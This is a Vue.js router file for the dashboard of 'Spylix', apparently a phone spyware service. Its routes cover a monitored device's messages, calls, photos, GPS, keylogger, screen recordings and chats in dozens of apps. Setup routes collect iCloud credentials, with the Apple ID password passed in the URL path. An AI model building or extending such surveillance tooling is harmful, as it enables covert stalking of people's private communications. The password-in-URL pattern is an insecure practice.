import Vue from "vue";
import i18n from "@/langurage/i18n";
import Router from "vue-router";
import index from "@/components/index";
import login from "@/components/login";
import password from "@/components/password";
import account from "@/components/account";
import accountTest from "@/components/accountTest";
import system from "@/components/system";
import systemTest from "@/components/systemTest";
import Forgot from "@/components/Forgot";
import Choos from "@/components/Choos";
import ChoosTest from "@/components/ChoosTest";
import header from "@/components/header";
import Device from "@/components/Device";
import Applications from "@/components/Applications";
import Calls from "@/components/Calls";
import Text from "@/components/Text";
import Events from "@/components/Events";
import ChoosCopy from "@/components/ChoosCopy";
import ChoosCopyTest from "@/components/ChoosCopyTest";
import Messages from "@/components/Messages";
import IMessages from "@/components/IMessages";
import Contacts from "@/components/Contacts";
import Notes from "@/components/Notes";
import Photos from "@/components/Photos";
import Videos from "@/components/Videos";
import Tracking from "@/components/Tracking";
import GPS from "@/components/GPS";
import Apps from "@/components/Apps";
import Browser from "@/components/Browser";
import BrowserHistory from "@/components/BrowserHistory";
import Email from "@/components/Email";
import WhatsApp from "@/components/WhatsApp";
import ShoppingCart from "@/components/ShoppingCart";
import Billing from "@/components/Billing";
import BillingCopy from "@/components/BillingCopy";
import Setting from "@/components/Setting";
import TermsOfUse from "@/components/TermsOfUse";
import Guidance from "@/components/Guidance";
import Choose from "@/components/Choose";
import CanYou from "@/components/CanYou";
import Manufacturer from "@/components/Manufacturer";
import Take from "@/components/Take";
import YouWill from "@/components/YouWill";
import Select from "@/components/Select";
import Disable from "@/components/Disable";
// import TwoFactor from '@/components/TwoFactor'
import And from "@/components/And";
import Enter from "@/components/Enter";
import Allow from "@/components/Allow";
import Verification from "@/components/Verification";
import SelectTheDevice from "@/components/SelectTheDevice";
import ok from "@/components/ok";
import Keylogger from "@/components/Keylogger";
import SimCard from "@/components/SimCard";
import GeoFencing from "@/components/GeoFencing";
import Website from "@/components/Website";
import WiFi from "@/components/WiFi";
// import index from '@/components/index'
import Snake from "@/components/Snake";
import Privagypolicy from "@/components/Privagypolicy";
// import padlerPay from '@/components/padlerPay'
import ShoppingCartCopy from "@/components/ShoppingCartCopy";
import screenRecording from "@/components/screenRecording";
import WahtsAppBusiness from "@/components/WahtsAppBusiness";
const originalPush = Router.prototype.push;
Router.prototype.push = function push(location) {
  return originalPush.call(this, location).catch((err) => err);
};
Vue.use(Router);
let routers = [
  {
    path: "/",
    name: "home",
    component: login,
    needLogin: false,
    needBind: false,
  },
  {
    path: "/login",
    name: "login",
    title: "Spylix Login",
    component: login,
    needLogin: false,
    needBind: false,
  },
  {
    path: "/resetpassword",
    name: "password",
    title: "Reset Password | Spylix",
    component: password,
    needLogin: false,
    needBind: false,
  },
  {
    path: "/signup",
    name: "account",
    title: "Spylix Sign Up For Free",
    component: account,
    needLogin: false,
    needBind: false,
  },
  {
    path: "/signupTest",
    name: "accountTest",
    title: "Spylix Sign Up For Free",
    component: accountTest,
    needLogin: false,
    needBind: false,
  },
  {
    path: "/choosedevice",
    name: "system",
    title: "Choose Device | Spylix",
    component: system,
    needLogin: true,
    needBind: false,
  },
  {
    path: "/choosedeviceTest",
    name: "systemTest",
    title: "Choose Device | Spylix",
    component: systemTest,
    needLogin: true,
    needBind: false,
  },
  {
    path: "/forgotpassword",
    name: "Forgot",
    title: "Forgot Password | Spylix",
    component: Forgot,
    needLogin: false,
    needBind: false,
  },
  {
    path: "/purchase/:type?",
    name: "Choos",
    title: "Purchase | Spylix",
    component: Choos,
    needLogin: true,
    needBind: false,
  },
  {
    path: "/purchasetest",
    name: "ChoosTest",
    title: "Purchase | Spylix",
    component: ChoosTest,
    needLogin: true,
    needBind: false,
  },
  {
    path: "/purchasetest1",
    name: "ChoosTest",
    title: "Purchase | Spylix",
    component: ChoosCopyTest,
    needLogin: true,
    needBind: false,
  },
  {
    path: "/purchasetest2",
    name: "ChoosTest",
    title: "Purchase | Spylix",
    component: BillingCopy,
    needLogin: true,
    needBind: false,
  },
  {
    path: "/ShoppingCartCopy",
    name: "ShoppingCartCopy",
    component: ShoppingCartCopy,
    needLogin: true,
    needBind: false,
  },
  {
    path: "/header",
    name: "header",
    component: header,
    needLogin: true,
    needBind: false,
    children: [
      {
        path: "/imessages",
        name: "iMessages",
        title: "iMessages | Spylix",
        component: IMessages,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/devicemanagement",
        name: "Device",
        title: "Device Management | Spylix",
        component: Device,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/appblock",
        name: "Applications",
        title: "App Block | Spylix",
        component: Applications,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/calls",
        name: "Calls",
        title: "Calls | Spylix",
        component: Calls,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/wifinetworks",
        name: "Text",
        title: "Wi-Fi Networks | Spylix",
        component: Text,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/events",
        name: "Events",
        title: "Events | Spylix",
        component: Events,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/purchasenewplan/:system?",
        name: "ChoosCopy",
        title: "Purchase New Plan | Spylix",
        component: ChoosCopy,
        needLogin: true,
        needBind: false,
      },
      {
        path: "/purchasenewplantest",
        name: "ChoosCopyTest",
        title: "Purchase New Plan | Spylix",
        component: ChoosCopyTest,
        needLogin: false,
        needBind: false,
      },
      {
        path: "/messages",
        name: "Messages",
        title: "Text Messages | Spylix",
        component: Messages,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/contacts",
        name: "Contacts",
        title: "Contacts | Spylix",
        component: Contacts,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/notes",
        name: "Notes",
        title: "Notes | Spylix",
        component: Notes,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/photos",
        name: "Photos",
        title: "Photos | Spylix",
        component: Photos,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/videos",
        name: "Videos",
        title: "Videos | Spylix",
        component: Videos,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/keywordalerts",
        name: "Tracking",
        title: "Keyword Alerts | Spylix",
        component: Tracking,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/gps",
        name: "GPS",
        title: "GPS Locations | Spylix",
        component: GPS,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/installedapps",
        name: "Apps",
        title: "Installed Apps | Spylix",
        component: Apps,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/bookmarks",
        name: "Browser",
        title: "Bookmarks | Spylix",
        component: Browser,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/browserhistory",
        name: "BrowserHistory",
        title: "Browser History | Spylix",
        component: BrowserHistory,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/email",
        name: "Email",
        title: "Email | Spylix",
        component: Email,
        needLogin: true,
        needBind: true,
      },
      {
        // path: '/whatsapp/:pkg?/:is3?',
        path: "/whatsapp",
        name: "WhatsApp",
        title: "WhatsApp | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },
      {
        // path: '/whatsapp/:pkg?/:is3?',
        path: "/wahtsappbusiness",
        path: "/wahtsappbusiness/:pkg?/:is3",
        name: "WahtsAppBusiness",
        title: "WahtsApp Business | Spylix",
        component: WahtsAppBusiness,
        needLogin: true,
        needBind: true,
      },

      {
        path: "/kik/:pkg?/:is3?",
        name: "Kik",
        title: "Kik | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/line/:pkg?/:is3?",
        name: "Line",
        title: "LINE | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/telegram/:pkg?/:is3?",
        name: "Telegram",
        title: "Telegram | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/viber/:pkg?/:is3?",
        name: "Viber",
        title: "Viber | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/tinder/:pkg?/:is3?",
        name: "Tinder",
        title: "Tinder | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/snapchat/:pkg?/:is3?",
        name: "Snapchat",
        title: "Snapchat | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/hangouts/:pkg?/:is3?",
        name: "Hangouts",
        title: "Hangouts | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/skype/:pkg?/:is3?",
        name: "Skype",
        title: "Skype | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/instagram/:pkg?/:is3?",
        name: "Instagram",
        title: "Instagram | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/facebook/:pkg?/:is3?",
        name: "Facebook",
        title: "Facebook | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/facebookmessenger/:pkg?/:is3?",
        name: "Messenger",
        title: "Facebook Messenger | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/tumblr/:pkg?/:is3?",
        name: "Tumblr",
        title: "Tumblr | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/badoo/:pkg?/:is3?",
        name: "Badoo",
        title: "Badoo | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/pof/:pkg?/:is3?",
        name: "POF",
        title: "POF | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/wechat/:pkg?/:is3?",
        name: "Wechat",
        title: "WeChat | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/qq/:pkg?/:is3?",
        name: "QQ",
        title: "QQ | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },

      {
        path: "/signal/:pkg?/:is3?",
        name: "Signal",
        title: "Signal | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/x/:pkg?/:is3?",
        name: "X",
        title: "X | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },

      {
        path: "/zoom/:pkg?/:is3?",
        name: "Zoom",
        title: "Zoom | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },

      {
        path: "/tiktok/:pkg?/:is3?",
        name: "Tiktok",
        title: "Tiktok | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },

      {
        path: "/reddit/:pkg?/:is3?",
        name: "Reddit",
        title: "Reddit | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },

      {
        path: "/trillian/:pkg?/:is3?",
        name: "Trillian",
        title: "Trillian | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },

      {
        path: "/linkedin/:pkg?/:is3?",
        name: "LinkedIn",
        title: "LinkedIn | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },

      {
        path: "/slack/:pkg?/:is3?",
        name: "Slack",
        title: "Slack | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },

      {
        path: "/imo/:pkg?/:is3?",
        name: "IMO",
        title: "IMO | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },

      {
        path: "/kakaotalk/:pkg?/:is3?",
        name: "KakaoTalk",
        title: "KakaoTalk | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },

      {
        path: "/discord/:pkg?/:is3?",
        name: "Discord",
        title: "Discord | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },

      {
        path: "/keet/:pkg?/:is3?",
        name: "Keet",
        title: "Keet | Spylix",
        component: WhatsApp,
        needLogin: true,
        needBind: true,
      },

      {
        path: "/ShoppingCart",
        name: "ShoppingCart",
        component: ShoppingCart,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/billing",
        name: "Billing",
        title: "Billing | Spylix",
        component: Billing,
        needLogin: true,
        needBind: false,
      },
      {
        path: "/settings",
        name: "Setting",
        title: "Settings | Spylix",
        component: Setting,
        needLogin: true,
        needBind: false,
      },
      {
        path: "/termsofuse",
        name: "TermsOfUse",
        title: "Terms of Use | Spylix",
        component: TermsOfUse,
        needLogin: true,
        needBind: false,
      },
      {
        path: "/privacypolicy",
        name: "Privagypolicy",
        title: "Privacy Policy | Spylix",
        component: Privagypolicy,
        needLogin: true,
        needBind: false,
      },
      {
        path: "/setup",
        name: "Guidance",
        title: "Set up | Spylix",
        component: Guidance,
        needLogin: true,
        needBind: false,
      },
      {
        path: "/choosedevice",
        name: "Choose",
        component: Choose,
        needLogin: true,
        needBind: false,
      },
      {
        path: "/canyou",
        name: "CanYou",
        component: CanYou,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/selectmanufacturer",
        name: "Manufacturer",
        title: "Set up | Spylix",
        component: Manufacturer,
        needLogin: true,
        needBind: false,
      },
      {
        path: "/take",
        name: "Take",
        component: Take,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/youwil",
        name: "YouWill",
        component: YouWill,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/select",
        name: "Select",
        title: "Set up | Spylix",
        component: Select,
        needLogin: true,
        needBind: false,
      },
      {
        path: "/install",
        name: "Disable",
        title: "Set up | Spylix",
        component: Disable,
        needLogin: true,
        needBind: false,
      },
      // {
      //   path: '/TwoFactor',
      //   name: 'TwoFactor',
      //   component: TwoFactor,
      //   needLogin: true,
      //   needBind: true
      // },
      {
        path: "/androidbindingsuccessful",
        name: "And",
        title: "Set up | Spylix",
        component: And,
        needLogin: true,
        needBind: false,
      },
      {
        path: "/entericloudcredentials",
        name: "Enter",
        title: "Set up | Spylix",
        component: Enter,
        needLogin: true,
        needBind: false,
      },
      {
        path: "/2stepverification/:equipment_id?/:user_id?/:apple_id?/:apple_pwd?",
        name: "Allow",
        title: "Set up | Spylix",
        component: Allow,
        needLogin: true,
        needBind: false,
      },
      {
        path: "/verification",
        // /:equipment_id?/:user_id?/:apple_id?/:apple_pwd?
        name: "Verification",
        title: "Set up | Spylix",
        component: Verification,
        needLogin: true,
        needBind: false,
      },
      {
        path: "/selectthedevice",
        name: "SelectTheDevice",
        component: SelectTheDevice,
        needLogin: true,
        needBind: false,
      },
      {
        path: "/iosbindingsuccessful",
        name: "ok",
        title: "Set up | Spylix",
        component: ok,
        needLogin: true,
        needBind: false,
      },
      {
        path: "/keylogger",
        name: "Keylogger",
        title: "Keylogger | Spylix",
        component: Keylogger,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/simcard",
        name: "SimCard",
        title: "Sim Card | Spylix",
        component: SimCard,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/geo-fencing",
        name: "GeoFencing",
        title: "Geo-fencing | Spylix",
        component: GeoFencing,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/websiteblock",
        name: "Website",
        title: "Website Block | Spylix",
        component: Website,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/wifiblock",
        name: "WiFi",
        title: "Wi-Fi Block | Spylix",
        component: WiFi,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/Snake",
        name: "Snake",
        component: Snake,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/screenrecordings",
        name: "screenRecording",
        title: "Screen Recordings | Spylix",
        component: screenRecording,
        needLogin: true,
        needBind: true,
      },
      {
        path: "/dashboard",
        name: "index",
        title: "Dashboard | Spylix",
        component: index,
        needLogin: true,
        needBind: true,
      },
    ],
  },
];
console.log(routers, 888);
let vm = new Vue();
let router = new Router({
  mode: "history",
  routes: routers,
});
const flatArray = (list) => {
  let arr = [];
  for (let i = 0; i < list.length; i++) {
    let temp = list[i];
    if (!temp.children) {
      arr = arr.concat([temp]);
    } else {
      arr = arr.concat(flatArray(temp.children));
    }
  }
  return arr;
};
let flatRouters = flatArray(routers);
const sso2Token = () => {
  var query = {};
  location.search
    .replace("?", "")
    .split("&")
    .forEach((val) => {
      var v = val.split("=");
      query[v[0]] = v[1];
    });

  if (!query.token && !query.id) {
    return;
  }
  localStorage.setItem("avatar", query.avatar);
  localStorage.setItem("id", query.id);
  localStorage.setItem("nickname", query.nickname);
  localStorage.setItem("email", query.email);
  localStorage.setItem("username", query.username);
  localStorage.setItem("token", query.token);
};

const checkLogin = (router) => {
  sso2Token();
  let token = localStorage.getItem("token");
  if (!router.needLogin || token) {
    return true;
  } else if (router.needLogin && !token) {
    return "login";
  }
};
const checkBind = (router) => {
  let status = localStorage.getItem("system-status");
  if (!router.needBind || Number(status) === 1) {
    return true;
  } else if (router.needBind && Number(status) !== 1) {
    vm.$message(i18n.t("disable.tips"));
    console.log("checkBind 执行结束", new Date().getTime());
    return "Guidance";
  }
};

let head = document.getElementsByTagName("head");
let meta = document.createElement("meta");
meta.name = "referrer";
meta.content = "origin";
head[0].appendChild(meta);

router.beforeEach(async (to, from, next) => {
  console.log(to);
  if (to.query.lang && !localStorage.getItem("locale")) {
    localStorage.setItem("locale", to.query.lang);
    i18n.locale = to.query.lang;
  }

  let toRouter = flatRouters.find((i) => i.name === to.name);
  // console.log(toRouter, 99)
  document.title = i18n.t(toRouter.title + ".title");
  let meta = document.createElement("meta");
  meta.name = "description";
  meta.content = i18n.t(toRouter.title + ".description");
  head[0].appendChild(meta);
  document.getElementsByTagName("body")[0].classList = to.name + "-Pager";
  let isOk = checkLogin(toRouter);
  if (isOk === true) {
    isOk = checkBind(toRouter);
  }
  console.log(isOk);
  // !toRouter.needBind &&
  if (toRouter.name === "home") {
    // 因为home 组件和 login 组件是同一个 那么去 home 自动转到login
    next({ name: "login" });
  } else if (isOk !== true) {
    next({ name: isOk });
  } else {
    // 如果当前页面需要登录 没有token 进入login
    next();
  }
});
export default router;



// WEBPACK FOOTER //
// ./src/router/index.js